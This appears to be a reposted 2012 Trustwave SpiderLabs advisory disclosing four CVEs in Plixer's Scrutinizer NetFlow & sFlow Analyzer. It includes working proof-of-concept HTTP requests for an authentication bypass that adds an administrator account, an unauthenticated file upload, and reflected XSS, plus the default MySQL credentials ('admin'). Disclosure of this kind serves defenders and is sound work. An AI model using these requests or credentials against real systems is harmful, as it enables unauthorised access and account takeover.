Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer ...
Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

Published: 07/31/12 
Version: 1.1

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer 
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html 
for the partial list.

Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.

Credits: 
Mario Ceballos of the Metasploit Project 
Jonathan Claudius of Trustwave Spiderlabs 
Tanya Secker of Trustwave SpiderLabs (https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt)

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626

The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users. 

Example(s):

This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.

#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: 10.70.70.212
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8

{"new_user_id":"2"}


Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627

The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability.  An attacker could exploit this vulnerability to upload files 
to the affected systems file system as well as overwrite the Scrutinizer 
applications SNMP configuration.

Example(s):

This request will upload a test file to the following location:

'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'

Note: This affected folder also contains SNMP configuration files which could 
be overwritten if an attacker were to select the right file name.

#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210


--_Part_949_3365333252_3066945593
Content-Disposition: form-data; 
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream

trustwave

--_Part_949_3365333252_3066945593--

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html

{"success":1,"file_name":"trustwave.txt"}

#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave


Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php 
CVE: CVE-2012-3848

The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:

1.) /d4d/contextMenu.php
2.) /d4d/exporters.php

These vulnerabilities include the following:

1.) XSS via arbitrary parameter
3.) XSS via referrer header

Example(s):

The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php

#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>

#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2

#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>

Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951

The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package.  The installation of these packages are transparent to the user
during the Scrutinizer installation.

The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker.  There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.

Example(s):

The following MySQL command can be run to see the users and their relative
passwords:

#Request
select User,Password from mysql.user;

#Response
User          |Password
root	      |
root	      |
scrutinizer   |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote   |*4ACFE3202A5FF5CF467898FC58AAB1D615029441

Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'

Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.

Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.


Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.

Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
07/31/12 - Version 1.1 published 

References
1. http://www.plixer.com
2. http://blog.spiderlabs.com


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
4月前
|
SQL 存储 安全
Vulnerability
【7月更文挑战第2天】
71 1
|
SQL 安全 Java
解决Fortify漏洞:Access Specifier Manipulation
解决Fortify漏洞:Access Specifier Manipulation
1156 0
5 Reasons Why You Should Try Kibana
Kibana offers its users several powerful and convenient development tools along with time series data, query data map analysis, and geographic location analysis.
7012 0
5 Reasons Why You Should Try Kibana
|
Windows 关系型数据库 Oracle
Troubleshooting Scheduler Autotask Issues (Doc ID 1561498.1)
In this Document   Purpose   Troubleshooting Steps   References   APPLIES TO: Oracle Database - Enterprise Edition - Version 11.
1431 0
es suggest did you mean资料
term suggester 功能介绍 term suggester 根据提供的文档提供搜索关键词的建议,也就是关键词自动纠错。该链接介绍如何使用 term suggester 语法。term suggester 是支持中文的,必须非常小心参数 min_word_length,默认值为 4,是指推荐词的长度大于 4 才会被显示,设置小一些能够开到效果(本人就被这个参数坑了,误以为 term suggester 不支持中文,绕了一大圈)。
985 0
Multi-host, Multi-stage Vulnerability Analysis Language
http://people.cis.ksu.edu/~xou/mulval/
1189 0
|
Python
You should rebuild using libgmp >= 5 to avoid timing attack vulnerability.", PowmInsecureWarning
su -s /bin/sh -c "glance-manage db_sync" glance/usr/lib64/python2.6/site-packages/Crypto/Util/number.
1157 0
下一篇
无影云桌面